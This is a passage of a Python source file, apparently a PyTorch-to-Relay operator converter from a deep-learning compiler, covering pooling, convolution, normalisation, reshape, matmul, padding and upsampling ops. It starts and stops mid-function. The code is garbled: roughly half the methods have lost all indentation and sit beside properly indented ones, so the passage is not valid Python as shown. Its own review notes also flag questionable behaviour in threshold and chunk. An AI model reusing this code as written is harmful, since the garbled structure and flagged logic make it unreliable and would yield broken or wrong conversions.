            # PyTorch seems to use the following output qparams, but accuracy
            # is broken if we use this.
            # TODO(masahi): Revisit this parameter choice
            #
            # Taken from src/ATen/native/quantized/cpu/kernels/QuantizedOpKernels.cpp
            # output_scale = _expr.const(0.00390625)  # 1.0 / 2^8
            # output_zero_point = _expr.const(-128)
            output_scale = input_scale
            output_zero_point = input_zero_point

            data = qnn.op.dequantize(inputs[0], input_scale, input_zero_point, axis=1)
            out = func(data)
            return qnn.op.quantize(out, output_scale, output_zero_point, out_dtype="uint8")

        return func(inputs[0])
def hard_swish(self, inputs, input_types):
data = inputs[0]
return data * self.hard_sigmoid(inputs, input_types)
    def adaptive_avg_pool(self, op, inputs, input_types):
        """Convert adaptive average pooling; *op* is the relay pool op.

        Quantized tensors are pooled via the upcast helper to avoid uint8
        accumulation error.
        """
        data = inputs[0]
        output_size = inputs[1]

        def func(x):
            return op(x, output_size=output_size)

        if self.is_quantized_tensor(data):
            return qnn_torch.apply_with_upcast(data, func)

        return func(data)
def adaptive_max_pool(self, op, inputs, input_types):
data = inputs[0]
output_size = inputs[1]
# returns dummy indices too
return op(data, output_size=output_size), None
    @staticmethod
    def convert_const_list(data):
        """Fold Relay-constant list entries to Python ints.

        NOTE: mutates *data* in place (and returns it) when it is a list.
        """
        if isinstance(data, list):
            for i, _ in enumerate(data):
                if isinstance(data[i], _expr.Expr):
                    data[i] = int(_infer_value_simulated(data[i], {}).numpy())
        return data
    def maxpool_2d(self, inputs, input_types):
        """Convert aten::max_pool2d (NCHW layout)."""
        data = inputs[0]
        # Kernel/stride may arrive as Relay consts; fold them to ints.
        pool_size = self.convert_const_list(inputs[1])
        strides = self.convert_const_list(inputs[2] if inputs[2] else pool_size)
        padding = inputs[3]
        dilation = inputs[4]
        ceil_mode = int(inputs[5])

        return _op.nn.max_pool2d(
            data,
            pool_size=pool_size,
            strides=strides,
            dilation=dilation,
            padding=padding,
            layout="NCHW",
            ceil_mode=ceil_mode,
        )
def maxpool_2d_with_indices(self, inputs, input_types):
# returns dummy indices too
return self.maxpool_2d(inputs, input_types), None
def maxpool_1d(self, inputs, input_types):
data = inputs[0]
pool_size = inputs[1]
strides = inputs[2] if inputs[2] else pool_size
padding = inputs[3]
dilation = inputs[4]
ceil_mode = int(inputs[5])
return _op.nn.max_pool1d(
data,
pool_size=pool_size,
strides=strides,
dilation=dilation,
padding=padding,
layout="NCW",
ceil_mode=ceil_mode,
)
def maxpool_3d(self, inputs, input_types):
data = inputs[0]
pool_size = inputs[1]
strides = inputs[2] if inputs[2] else pool_size
padding = inputs[3]
dilation = inputs[4]
ceil_mode = int(inputs[5])
return _op.nn.max_pool3d(
data,
pool_size=pool_size,
strides=strides,
dilation=dilation,
padding=padding,
ceil_mode=ceil_mode,
)
def hardtanh(self, inputs, input_types):
a = inputs[0]
tanh_min = float(inputs[1])
tanh_max = float(inputs[2])
return _op.tensor.clip(a, tanh_min, tanh_max)
    def convolution(self, inputs, input_types):
        """Convert aten::_convolution to relay conv1d/2d/3d (or transpose).

        inputs: [data, weight, bias, stride, padding, dilation, transposed,
        output_padding, groups, ...]. Depthwise weights are reshaped so
        Relay recognizes them, and grouped conv1d is emulated via conv2d.
        """
        # Use transpose or normal
        use_transpose = True if inputs[6] == 1 else False

        data = inputs[0]
        weight = inputs[1]
        bias = inputs[2]
        strides = tuple(inputs[3])
        padding = tuple(inputs[4])
        dilation = tuple(inputs[5])

        if isinstance(weight, _expr.Expr):
            inferred_shape = self.infer_shape(weight)
            weight_shape = []
            for infer in inferred_shape:
                weight_shape.append(infer)
        else:
            msg = "Data type %s could not be parsed in conv op" % (type(weight))
            raise AssertionError(msg)

        # Transposed convolutions have IOHW layout.
        if use_transpose:
            weight_shape[0], weight_shape[1] = weight_shape[1], weight_shape[0]

        channels = weight_shape[0]
        groups = int(inputs[8])

        # Check if this is depth wise convolution
        # We need to reshape weight so that Relay could recognize this is depth wise
        # weight_shape[1] is always in_channels // groups
        # For depthwise, in_channels == groups, so weight_shape[1] == 1
        # If groups > 1 but weight_shape[1] != 1, this is group convolution
        if groups > 1 and weight_shape[1] == 1:
            channel_multiplier = channels // groups
            new_weight_shape = (groups, channel_multiplier) + tuple(weight_shape[2:])
            weight = _op.transform.reshape(weight, new_weight_shape)

        kernel_size = weight_shape[2:]
        use_bias = isinstance(bias, _expr.Expr)

        # We are trying to invoke various relay operations through a single conv_op variable.
        # However the function signatures for some operations have additional attributes so we
        # pass these in along with the standard ones.
        additional_arguments = dict()

        if use_transpose:
            if len(kernel_size) == 3:
                conv_op = _op.nn.conv3d_transpose
            elif len(kernel_size) == 2:
                conv_op = _op.nn.conv2d_transpose
            else:
                conv_op = _op.nn.conv1d_transpose
            output_padding = tuple(inputs[7])
            additional_arguments["output_padding"] = output_padding

        else:
            if len(kernel_size) == 3:
                conv_op = _op.nn.conv3d
            elif len(kernel_size) == 2:
                conv_op = _op.nn.conv2d
            else:
                conv_op = _op.nn.conv1d

        if len(kernel_size) == 3:
            data_layout = "NCDHW"
            kernel_layout = "OIDHW"
        elif len(kernel_size) == 2:
            data_layout = "NCHW"
            kernel_layout = "OIHW"
            if use_transpose:
                # Transposed convolutions have IOHW layout.
                kernel_layout = "IOHW"
        else:
            data_layout = "NCW"
            kernel_layout = "OIW"

        # Conv1d does not currently support grouped convolution so we convert it to conv2d
        is_grouped_conv1d = False
        if groups > 1 and len(kernel_size) == 1 and not use_transpose:
            is_grouped_conv1d = True
            conv_op = _op.nn.conv2d
            # Insert a unit H dimension everywhere so conv2d sees (N, C, 1, W).
            kernel_size = [1] + kernel_size
            strides = (1,) + strides
            padding = (0,) + padding
            dilation = (1,) + dilation
            data = _op.expand_dims(data, axis=2)
            weight = _op.expand_dims(weight, axis=2)
            data_layout = "NCHW"
            kernel_layout = "OIHW"

        conv_out = conv_op(
            data,
            weight,
            strides=strides,
            padding=padding,
            dilation=dilation,
            groups=groups,
            channels=channels,
            kernel_size=kernel_size,
            data_layout=data_layout,
            kernel_layout=kernel_layout,
            out_layout="",
            out_dtype="",
            **additional_arguments,
        )
        if use_bias:
            res = _op.nn.bias_add(conv_out, bias)
        else:
            res = conv_out
        if is_grouped_conv1d:
            # Because we conducted grouped conv1d convolution through conv2d we must
            # squeeze the output to get the correct result.
            res = _op.squeeze(res, axis=[2])
        return res
def softmax(self, inputs, input_types):
data = inputs[0]
axis = inputs[1]
if isinstance(axis, str):
axis = int(axis)
return _op.nn.softmax(data, axis=axis)
    def threshold(self, inputs, input_types):
        """Convert aten::threshold as relu.

        NOTE(review): the threshold and replacement-value arguments
        (inputs[1], inputs[2]) are ignored, so this is only correct for
        threshold == value == 0 (i.e. relu) — confirm callers.
        """
        data = inputs[0]
        return _op.nn.relu(data)
    def contiguous(self, inputs, input_types):
        """aten::contiguous is a no-op here — Relay has no memory-layout notion."""
        return inputs[0]
    def batch_norm(self, inputs, input_types):
        """Convert aten::batch_norm (inference form, axis=1 / NCHW).

        When weight/bias are absent, identity gamma/beta constants are
        synthesized so relay batch_norm can still be used.
        """
        data = inputs[0]
        data_type = input_types[0]

        channels = self.infer_shape(data)

        if isinstance(inputs[1], _expr.Expr) and isinstance(inputs[2], _expr.Expr):
            scale = center = True
            weight = inputs[1]
            beta = inputs[2]
            gamma = weight
        else:
            scale = center = False

        if not scale:
            gamma = _create_typed_const(np.ones([int(channels[1])]), data_type)

        if not center:
            beta = _create_typed_const(np.zeros([int(channels[1])]), data_type)

        moving_mean = inputs[3]
        moving_var = inputs[4]
        epsilon = float(inputs[7])

        # [0] drops the returned moving-stat outputs; only the normalized
        # tensor is used.
        return _op.nn.batch_norm(
            data,
            gamma,
            beta,
            moving_mean,
            moving_var,
            axis=1,
            epsilon=epsilon,
            center=center,
            scale=scale,
        )[0]
    def instance_norm(self, inputs, input_types):
        """Convert aten::instance_norm (axis=1), synthesizing identity
        gamma/beta when weight/bias are absent."""
        data = inputs[0]
        data_type = input_types[0]
        channels = self.infer_shape(data)

        if isinstance(inputs[1], _expr.Expr) and isinstance(inputs[2], _expr.Expr):
            scale = center = True
            weight = inputs[1]
            beta = inputs[2]
            gamma = weight
        else:
            scale = center = False

        if not scale:
            gamma = _create_typed_const(np.ones([int(channels[1])]), data_type)

        if not center:
            beta = _create_typed_const(np.zeros([int(channels[1])]), data_type)

        epsilon = float(inputs[7])
        return _op.nn.instance_norm(
            data, gamma, beta, axis=1, epsilon=epsilon, center=center, scale=scale
        )
    def get_dims(self, data):
        """Return the shape of *data*, whether it is a Relay expr, a plain
        list (already a shape), or a torch/numpy tensor."""
        import torch

        if isinstance(data, _expr.Expr):
            dims = self.infer_shape(data)
        elif isinstance(data, list):
            dims = data
        elif isinstance(data, (torch.Tensor, np.ndarray)):
            dims = data.shape
        else:
            msg = "Data type %s could not be parsed" % type(data)
            raise AssertionError(msg)
        return dims
    def layer_norm(self, inputs, input_types):
        """Convert aten::layer_norm; only last-dim normalization is supported.

        inputs: [data, normalized_shape, weight, bias, eps, ...].
        """
        data = inputs[0]
        ndims = len(self.get_dims(inputs[1]))
        assert ndims == 1, "Support only normalization over last one dimension."

        return _op.nn.layer_norm(
            data,
            gamma=inputs[2],
            beta=inputs[3],
            axis=-1,
            epsilon=float(inputs[4]),
            center=True,
            scale=True,
        )
def group_norm(self, inputs, input_types):
data = inputs[0]
gamma = inputs[2]
beta = inputs[3]
num_groups = inputs[1]
epsilon = float(inputs[4])
return _op.nn.group_norm(
data,
gamma=gamma,
beta=beta,
num_groups=num_groups,
axis=1,
epsilon=epsilon,
center=True,
scale=True,
)
def transpose(self, inputs, input_types):
data = inputs[0]
import torch
if isinstance(data, _expr.Expr):
ndims = len(self.infer_shape_with_prelude(data))
elif isinstance(data, list):
ndims = data
elif isinstance(data, (torch.Tensor, np.ndarray)):
ndims = data.shape
else:
msg = "Data type %s could not be parsed in transpose op" % (type(data))
raise AssertionError(msg)
if isinstance(data, tvm.runtime.NDArray):
ndims = len(data.shape)
axes = list(range(ndims))
num_inputs = len(inputs)
if num_inputs == 1:
if ndims >= 2:
axes[-1] = ndims - 2
axes[-2] = ndims - 1
if not isinstance(data, _expr.Expr):
data = _expr.const(data)
elif num_inputs == 3:
parse = lambda i: ndims * (i < 0) + i
src, dst = [parse(int(inputs[i])) for i in [1, 2]]
axes[src] = dst
axes[dst] = src
else:
axes = inputs[1]
return _op.transform.transpose(data, axes)
    def flatten(self, inputs, input_types):
        """Convert aten::flatten(data, start_dim, end_dim).

        Implemented with reshape special codes: 0 copies a dim, -1 absorbs
        the flattened range; trailing unit dims inserted to keep rank are
        squeezed away afterwards.
        """
        data = inputs[0]
        start = int(inputs[1])
        end = int(inputs[2])
        dshape = get_const_tuple(self.infer_shape_with_prelude(data))
        ndim = len(dshape)
        if end < 0:
            end += ndim
        new_shape = [0] * start

        new_shape.append(-1)
        squeeze_axes = []
        for i in range(start + 1, end + 1):
            new_shape.append(1)
            squeeze_axes.append(i)
        for _ in range(end + 1, ndim):
            new_shape.append(0)
        out = _op.reshape(data, new_shape)
        if squeeze_axes:
            out = _op.squeeze(out, axis=squeeze_axes)
        return out
def addmm(self, inputs, input_types):
input_mat = inputs[0]
mat1 = inputs[1]
data_type = input_types[1]
mat2 = inputs[2]
beta = inputs[3]
alpha = inputs[4]
if not isinstance(alpha, _expr.Expr) and alpha != 1:
alpha = _create_typed_const(alpha, data_type)
mat1 *= alpha
if not isinstance(beta, _expr.Expr) and beta != 1:
beta = _create_typed_const(beta, data_type)
mat2 *= beta
transposed_mat2 = _op.transform.transpose(mat2, axes=[1, 0])
units = self.infer_shape(transposed_mat2)[0]
dense_out = _op.nn.dense(mat1, transposed_mat2, units=units)
return dense_out + input_mat
    def size(self, inputs, input_types):
        """Convert aten::size, returning consts for static shapes and a
        shape_of expression when the (requested) dim is dynamic."""
        shape = self.infer_shape_with_prelude(inputs[0])
        axis = None
        if len(inputs) > 1:
            axis = int(inputs[1])

        if any(map(lambda s: isinstance(s, tvm.tir.expr.Any), shape)):
            if axis is None or isinstance(shape[axis], tvm.tir.expr.Any):
                # Dynamic: defer to a runtime shape_of (optionally indexed).
                shape_dynamic = _op.shape_of(inputs[0], dtype="int32")
                if axis is not None:
                    return _op.take(shape_dynamic, _expr.const(axis), 0)
                return shape_dynamic

        if axis is not None:
            return _expr.const(shape[axis])
        return _expr.const(shape)
    def numtotensor(self, inputs, input_types):
        """Convert prim::NumToTensor — wrap a scalar as a 0-d array.

        NOTE(review): returns a NumPy 0-d array (not a Relay const);
        presumably downstream wrapping handles the conversion — confirm.
        """
        val = inputs[0]
        dtype = input_types[0]

        if isinstance(val, _expr.Expr):
            return val

        if isinstance(val, tvm.tir.IntImm):
            val = val.__int__()
            # Use the Python int type so np.astype produces an integer array.
            dtype = int

        arr = val * np.ones([]).astype(dtype)
        return arr
    def tensortonum(self, inputs, input_types):
        """aten::Int/aten::Float scalar extraction — pass the value through."""
        return inputs[0]
def view(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 3:
shape_inp = [inputs[1], self.infer_shape(inputs[2])[0]]
else:
if isinstance(inputs[1], list):
shape_inp = inputs[1]
else:
shape_inp = self.infer_shape(inputs[1])
new_shape = shape_inp
for i, shape in enumerate(shape_inp):
if isinstance(shape, _expr.Expr):
val = _infer_value_simulated(shape, {})
new_shape[i] = val.numpy().item(0)
return _op.transform.reshape(data, new_shape)
    def reshape(self, inputs, input_types):
        """Convert aten::reshape.

        Dims that fold to constants produce a static reshape; if any dim
        stays dynamic, the whole target shape becomes a 1-D int64 tensor.
        """
        data = inputs[0]
        new_shape = inputs[1]

        tmp_shape = []
        is_dyn = False
        for s in new_shape:
            if isinstance(s, _expr.Constant):
                tmp_shape.append(int(s.data.numpy()))
            elif isinstance(s, _expr.Expr):
                dim, success = try_infer_value(s, lambda ret: int(ret))
                tmp_shape.append(dim)

                if not success:
                    is_dyn = True
            else:
                tmp_shape.append(s)

        if is_dyn:
            # Mixed static/dynamic dims: build shape as concat of 1-elem
            # int64 tensors.
            new_shape = []
            for i, s in enumerate(tmp_shape):
                if not isinstance(s, _expr.Expr):
                    s = _expr.const(s, "int64")
                else:
                    s = _op.cast(s, "int64")
                new_shape.append(_op.expand_dims(s, axis=0))
            new_shape = _op.concatenate(new_shape, axis=0)
        else:
            new_shape = tmp_shape
        return _op.transform.reshape(data, new_shape)
def pixel_shuffle(self, inputs, input_types):
data = inputs[0]
upscale_factor = inputs[1]
upscale_squared = upscale_factor * upscale_factor
b, c, h, w = self.infer_shape(data)
assert (
c % upscale_squared == 0
), "input channel should be divisible by square of upscale_factor"
ndims = len(self.infer_shape_with_prelude(data))
axes = list(range(ndims))
num_inputs = len(inputs)
oc = c // upscale_squared
oh = h * upscale_factor
ow = w * upscale_factor
new_shape = [b, oc, upscale_factor, upscale_factor, h, w]
out_shape = [b, oc, oh, ow]
data = _op.transform.reshape(data, new_shape)
# The data will be transposed to
# [b, oc, h, upscale_factor, w, upscale_factor]
# for further reshape
axes = [0, 1, 4, 2, 5, 3]
data = _op.transform.transpose(data, axes)
return _op.transform.reshape(data, out_shape)
def clone(self, inputs, input_types):
data = inputs[0]
return _op.tensor.copy(data)
def log_softmax(self, inputs, input_types):
data = inputs[0]
axis = int(inputs[1])
return _op.nn.log_softmax(data, axis)
def sigmoid(self, inputs, input_types):
data = inputs[0]
return _op.tensor.sigmoid(data)
def softplus(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
beta = _expr.const(float(inputs[1]), dtype=dtype)
return _op.log(_op.exp(inputs[0] * beta) + _expr.const(1.0, dtype=dtype)) / beta
    def make_avg_pool(self, dim):
        """Build an aten::avg_poolNd converter for dim in {1, 2, 3}."""
        def avg_pool(inputs, input_types):
            data = inputs[0]
            # Pooling attributes; strides default to pool_size when not given.
            pool_size = self.convert_const_list(inputs[1])
            strides = self.convert_const_list(inputs[2] if inputs[2] else pool_size)
            padding = inputs[3]
            ceil_mode = int(inputs[4])
            count_include_pad = int(inputs[5])
            def func(x):
                if dim == 1:
                    return _op.nn.avg_pool1d(
                        x,
                        pool_size=pool_size,
                        strides=strides,
                        padding=padding,
                        dilation=(1,),
                        ceil_mode=ceil_mode,
                        count_include_pad=count_include_pad,
                    )
                elif dim == 2:
                    return _op.nn.avg_pool2d(
                        x,
                        pool_size=pool_size,
                        strides=strides,
                        padding=padding,
                        dilation=(1, 1),
                        ceil_mode=ceil_mode,
                        count_include_pad=count_include_pad,
                    )
                elif dim == 3:
                    return _op.nn.avg_pool3d(
                        x,
                        pool_size=pool_size,
                        strides=strides,
                        padding=padding,
                        dilation=(1, 1, 1),
                        ceil_mode=ceil_mode,
                        count_include_pad=count_include_pad,
                    )
                else:
                    msg = "Average Pooling dimension should be between 1 and 3"
                    raise RuntimeError(msg)
            # Quantized tensors are pooled with an upcast wrapper.
            if self.is_quantized_tensor(data):
                return qnn_torch.apply_with_upcast(data, func)
            return func(data)
        return avg_pool
    def linear(self, inputs, input_types):
        """Convert aten::linear: x @ W^T (+ optional bias).
        https://pytorch.org/docs/stable/nn.functional.html#linear
        """
        # 0 - input
        # 1 - weight
        bias = inputs[2]
        a_shape = self.infer_shape_with_prelude(inputs[0])
        b_shape = self.infer_shape_with_prelude(inputs[1])
        if len(a_shape) == 2 and len(b_shape) == 2:
            # Plain 2-D case maps directly to dense (dense transposes weight).
            mm_out = _op.nn.dense(inputs[0], inputs[1])
        elif len(b_shape) == 1:
            mm_out = self.matmul([inputs[0], inputs[1]], input_types[:2])
        else:
            # Higher-rank input: pre-transpose weight so matmul computes x @ W^T.
            mm_out = self.matmul(
                [inputs[0], _op.transpose(inputs[1], axes=(1, 0))], input_types[:2]
            )
        if isinstance(bias, _expr.Expr):
            bias_ndims = len(self.infer_shape_with_prelude(bias))
            if bias_ndims == 1:
                return _op.nn.bias_add(mm_out, bias, axis=-1)
            # Non-vector bias: fall back to broadcasting elementwise add.
            mm_dtype = self.infer_type_with_prelude(mm_out).dtype
            return self.add([mm_out, bias], [mm_dtype, input_types[2]])
        return mm_out
def dropout(self, inputs, input_types):
data = inputs[0]
rate = float(inputs[1])
return _op.nn.dropout(data, rate)
    def make_reduce(self, name):
        """Build a converter for the named relay reduction op (sum, prod, ...)."""
        def reduce(inputs, input_types):
            data = inputs[0]
            axis = None
            keepdims = False
            if len(inputs) > 2:  # default, torch have only data, axis=None, keepdims=False
                if isinstance(inputs[1], int):
                    axis = int(inputs[1])
                elif _is_int_seq(inputs[1]):
                    axis = inputs[1]
                else:
                    # axis given as a non-int value: use its inferred shape as the dims
                    axis = list(self.infer_shape(inputs[1]))
                keepdims = bool(inputs[2])
            return get_relay_op(name)(data, axis=axis, keepdims=keepdims)
        return reduce
def norm(self, inputs, input_types):
data = inputs[0]
dtype = input_types[0]
axis = None
keepdims = False
if len(inputs) > 3:
axis = inputs[2]
keepdims = bool(inputs[3])
order = inputs[1]
if order == np.inf:
return _op.reduce.max(_op.abs(data), axis=axis, keepdims=keepdims)
elif order == np.NINF:
return _op.reduce.min(_op.abs(data), axis=axis, keepdims=keepdims)
else:
reci_order = _expr.const(1.0 / order, dtype=dtype)
order = _expr.const(order)
return _op.power(
_op.reduce.sum(_op.power(_op.abs(data), order), axis=axis, keepdims=keepdims),
reci_order,
)
def frobenius_norm(self, inputs, input_types):
data = inputs[0]
axis = None
keepdims = False
if len(inputs) > 2:
axis = inputs[1] if len(inputs[1]) > 0 else None
keepdims = bool(inputs[2])
return _op.sqrt(_op.reduce.sum((data * data), axis=axis, keepdims=keepdims))
def std(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 2:
axis = None
keepdims = False
unbiased = bool(inputs[1])
else:
axis = inputs[1]
keepdims = bool(inputs[3])
unbiased = bool(inputs[2])
return _op.reduce.std(data, axis=axis, keepdims=keepdims, unbiased=unbiased)
def variance(self, inputs, input_types):
data = inputs[0]
if len(inputs) == 2:
axis = None
keepdims = False
unbiased = bool(inputs[1])
else:
axis = inputs[1]
keepdims = bool(inputs[3])
unbiased = bool(inputs[2])
return _op.reduce.variance(data, axis=axis, keepdims=keepdims, unbiased=unbiased)
    def mean(self, inputs, input_types):
        """Convert aten::mean; quantized tensors go through qnn's mean helper."""
        data = inputs[0]
        if inputs[1]:
            axis = inputs[1]
        else:
            axis = None
        if len(inputs) > 2 and inputs[2]:
            keepdims = int(inputs[2])
        else:
            keepdims = False
        if len(inputs) > 3 and inputs[3]:
            exclude = int(inputs[3])
        else:
            exclude = False
        def func(x):
            return _op.mean(x, axis, keepdims, exclude)
        if self.is_quantized_tensor(data):
            # input qparams (scale, zero point) are appended to inputs upstream
            assert len(inputs) == 6, "Input quant param not found in op inputs"
            input_scale = _expr.const(inputs[4])
            input_zero_point = _expr.const(inputs[5])
            return qnn_torch.quantized_mean(data, input_scale, input_zero_point, func)
        return func(data)
    def chunk(self, inputs, input_types):
        """Convert aten::chunk by splitting at uniform indices along axis.

        NOTE(review): when dim is not divisible by num_chunks the chunk size is
        dim // (num_chunks - 1); confirm this matches torch.chunk's
        ceil-division semantics for all inputs.
        """
        data = inputs[0]
        num_chunks = int(inputs[1])
        axis = int(inputs[2])
        if isinstance(data, _expr.Expr):
            inferred_shape = self.infer_shape_with_prelude(data)
        shape = []
        for infer in inferred_shape:
            shape.append(infer)
        dim = int(shape[axis])
        if dim % num_chunks:
            unif_size = int(dim / (num_chunks - 1))
        else:
            unif_size = int(dim / num_chunks)
        # split points at multiples of the uniform chunk size
        indeces = []
        for i in range(unif_size, dim, unif_size):
            indeces.append(i)
        return _op.split(data, indeces, axis)
    def matmul(self, inputs, input_types):
        """Convert aten::matmul, covering dense, batched, and mixed-rank cases."""
        inputs_0 = inputs[0]
        inputs_1 = inputs[1]
        # Need to check input shape as batch matmul must be supported.
        a_shape = self.infer_shape_with_prelude(inputs_0)
        b_shape = self.infer_shape_with_prelude(inputs_1)
        # When performing a batch matmul, we need to properly handle N-dim shapes.
        if len(a_shape) > 2 and len(b_shape) > 2:
            # Convert a into a 3 dimensional tensors.
            need_reshape_output = False
            if len(a_shape) != 3:
                a = _op.reshape(inputs_0, [-1, a_shape[-2], a_shape[-1]])
                need_reshape_output = True
            else:
                a = inputs_0
            # Transpose matrix dimensions of b.
            trans_axes = list(range(len(b_shape)))
            trans_axes[-2], trans_axes[-1] = trans_axes[-1], trans_axes[-2]
            b = _op.transpose(inputs_1, trans_axes)
            # Convert b into a 3 dimensional tensor. Note that the last two dimensions
            # are transposed.
            if len(b_shape) != 3:
                b = _op.reshape(b, [-1, b_shape[-1], b_shape[-2]])
            # Perform a batch matmul.
            output = _op.nn.batch_matmul(a, b)
            # Reshape output to original dimensions.
            if need_reshape_output:
                return _op.reshape(output, [*a_shape[:-2], a_shape[-2], b_shape[-1]])
            return output
        elif len(a_shape) > 2:
            # Flatten leading dims of a so the dense path below applies.
            inputs_0 = _op.reshape(inputs_0, [-1, a_shape[-1]])
        # Normalize b into the 2-D "weight" layout expected by dense.
        if len(b_shape) > 2:
            trans_axes = list(range(len(b_shape)))
            trans_axes[-2], trans_axes[-1] = trans_axes[-1], trans_axes[-2]
            input_1 = _op.reshape(_op.transpose(inputs_1, trans_axes), [-1, b_shape[-2]])
        elif len(b_shape) == 2:
            input_1 = _op.transpose(inputs_1, axes=(1, 0))
        elif len(b_shape) == 1:
            input_1 = _op.expand_dims(inputs_1, 0, 1)
        out = _op.nn.dense(inputs_0, input_1)
        if len(b_shape) == 1:
            out = _op.squeeze(out, axis=[-1])
        # Reshape output into a N dimensional tensor when a or b dim > 2
        if len(a_shape) > 2:
            out = _op.reshape(out, [*a_shape[:-1], b_shape[-1]])
        elif len(b_shape) > 2:
            out = _op.reshape(out, [a_shape[-2], -1, b_shape[-1]])
            out = _op.reshape(
                _op.transpose(out, [1, 0, 2]), [*b_shape[:-2], a_shape[-2], b_shape[-1]]
            )
        return out
    def expand(self, inputs, input_types):
        """Convert aten::expand by repeating size-1 dims to the requested sizes."""
        data_in = inputs[0]
        shape = list(self.infer_shape(data_in))
        ndims = len(shape)
        sizes = inputs[1]
        out = data_in
        out_dims = len(sizes)
        if ndims < out_dims:
            # Prepend unit axes so ranks match before repeating.
            num_newaxis = out_dims - ndims
            out = _op.expand_dims(out, axis=0, num_newaxis=num_newaxis)
            shape = [1] * num_newaxis + shape
        for i in range(out_dims):
            # -1 means "keep this dim"; only size-1 dims are broadcast.
            if sizes[i] != -1 and shape[i] == 1:
                if not isinstance(sizes[i], int):
                    sizes[i] = int(_infer_value(sizes[i], {}).numpy())
                out = _op.repeat(out, sizes[i], axis=i)
        return out
def int(self, inputs, input_types):
if isinstance(inputs[0], _expr.Expr):
return inputs[0]
return int(inputs[0])
def identity(self, inputs, input_types):
return inputs[0]
def none(self, inputs, input_types):
return None
    def make_pad(self, mode):
        """Build an aten pad converter for the given pad mode."""
        def pad(inputs, input_types):
            data = inputs[0]
            if isinstance(inputs[1], list):
                pad_list = inputs[1]
            else:
                pad_list = list(self.infer_shape(inputs[1]))
            # initialize paddings based on input len
            pad_len = len(self.infer_shape(data)) * 2
            paddings = [0] * pad_len
            # torch orders pads from the last dim backwards: (left, right, top, bottom, ...)
            if len(pad_list) >= 2:
                paddings[-1] = pad_list[1]
                paddings[-2] = pad_list[0]
            if len(pad_list) >= 4:
                paddings[-3] = pad_list[3]
                paddings[-4] = pad_list[2]
            if len(pad_list) >= 6:
                paddings[-5] = pad_list[5]
                paddings[-6] = pad_list[4]
            # group into tuple of 2 ints
            paddings = [paddings[i : i + 2] for i in range(0, len(paddings), 2)]
            const_paddings = []
            for pad in paddings:
                const_paddings.append([])
                for p in pad:
                    if not isinstance(p, int):
                        # fold symbolic pad amounts to concrete ints
                        p = int(_infer_value(p, {}).numpy())
                    const_paddings[-1].append(p)
            if mode == "constant":
                return _op.nn.pad(data, const_paddings, pad_value=inputs[2], pad_mode=mode)
            else:
                return _op.nn.pad(data, const_paddings, pad_mode=mode)
        return pad
    def clamp(self, inputs, input_types):
        """Convert aten::clamp; missing bounds default to float32 min/max."""
        data = inputs[0]
        def get_v(v, default_v):
            # Bounds may be constants, inferable exprs, python numbers, or None.
            if isinstance(v, _expr.Constant):
                return float(v.data.numpy())
            if isinstance(v, _expr.Expr):
                infer_v, success = try_infer_value(v, lambda ret: float(ret))
                if success:
                    return infer_v
            if v is not None:
                return v
            return default_v
        amin = get_v(inputs[1], np.finfo(np.float32).min)
        amax = get_v(inputs[2], np.finfo(np.float32).max)
        return _op.clip(data, amin, amax)
    def to(self, inputs, input_types):
        """Convert aten::to (dtype casts only; other variants are pass-through)."""
        data = inputs[0]
        # dtype code sits in inputs[1] unless that slot holds None/a device string
        dtype = inputs[1] if inputs[1] is not None and not isinstance(inputs[1], str) else inputs[2]
        # special handling for aten::to(data, 6, _, _, _) case
        # 6 means dtype = float
        # this happens when converting upsampling with scale factor
        cast_map = {
            5: "float16",
            6: "float32",
            7: "float64",
            3: "int32",
            4: "int64",
        }
        cast_func = {5: float, 6: float, 7: float, 3: int, 4: int}
        ret = data
        if isinstance(data, _expr.Expr):
            actual_dtype = str(self.infer_type(data).dtype)
            # skip the cast when the value already has the requested dtype
            if dtype in cast_map and cast_map[dtype] != actual_dtype:
                ret = _op.cast(data, cast_map[dtype])
        elif dtype in cast_map:
            # python scalar: cast with the matching python type
            ret = cast_func[dtype](data)
        return ret
    def get_upsample_out_size(self, inputs, method):
        """Compute the output spatial size for upsample ops from an explicit
        size list (inputs[1]) or, failing that, from scale factors."""
        # This assumes a static shape
        out_size = []
        if inputs[1] is not None:
            for size in inputs[1]:
                if not isinstance(size, int):
                    out_size.append(int(_infer_value(size, {}).numpy()))
                else:
                    out_size.append(size)
        else:
            # scale factor position differs between nearest and interpolating modes
            scale_index = 3 if method != "nearest_neighbor" else 2
            scales = inputs[scale_index]
            assert scales is not None, "neither out size nor scale provided"
            assert isinstance(scales, list)
            ishape = self.infer_shape(inputs[0])
            for i, scale in enumerate(scales):
                # spatial dims start at index 2 (after batch and channel)
                out_size.append(int(math.floor(float(ishape[2 + i]) * scale)))
        return out_size
    def make_upsample(self, method):
        """Build a 2-D upsample converter for the given resize method."""
        def upsample(inputs, input_types):
            data = inputs[0]
            out_size = self.get_upsample_out_size(inputs, method)
            if len(inputs) > 2 and method != "nearest_neighbor":
                align_corners = inputs[2]
            else:
                align_corners = False
            # coordinate transform follows the torch semantics for each method
            if method == "nearest_neighbor":
                coord_trans = "asymmetric"
            elif align_corners:
                coord_trans = "align_corners"
            else:
                coord_trans = "half_pixel"
            def func(x):
                return _op.image.resize2d(
                    x, out_size, "NCHW", method, coord_trans, cubic_alpha=-0.75
                )
            if self.is_quantized_tensor(data):
                # input qparams are manually appended by us
                assert isinstance(inputs[-2], float)
                assert isinstance(inputs[-1], int)
                input_scale = _expr.const(inputs[-2])
                input_zero_point = _expr.const(inputs[-1])
                return qnn_torch.quantized_upsample(data, input_scale, input_zero_point, func)
            return func(data)
        return upsample
    def make_upsample3d(self, method):
        """Build a 3-D upsample converter for the given resize method."""
        def upsample3d(inputs, input_types):
            data = inputs[0]
            out_size = self.get_upsample_out_size(inputs, method)
            if len(inputs) > 2 and method == "linear":
                align_corners = inputs[2]
            else:
                align_corners = False
            if method == "nearest_neighbor":
                coord_trans = "asymmetric"
            elif align_corners:
                coord_trans = "align_corners"
            else:
                coord_trans = "half_pixel"
            return _op.image.resize3d(data, out_size, "NCDHW", method, coord_trans)
        return upsample3d
def expand_as(self, inputs, input_types):
target = inputs[1]
t0 = self.infer_type(inputs[0]).dtype
t1 = self.infer_type(inputs[1]).dtype
if str(t0) != str(t1):
target = _op.cast(target, t0)
return _op.broadcast_to_like(inputs[0], target)
def Bool(self, inputs, input_types):
assert len(inputs) == 1
return inputs[0]
def Float(self, inputs, input_types):
assert len(inputs) == 1
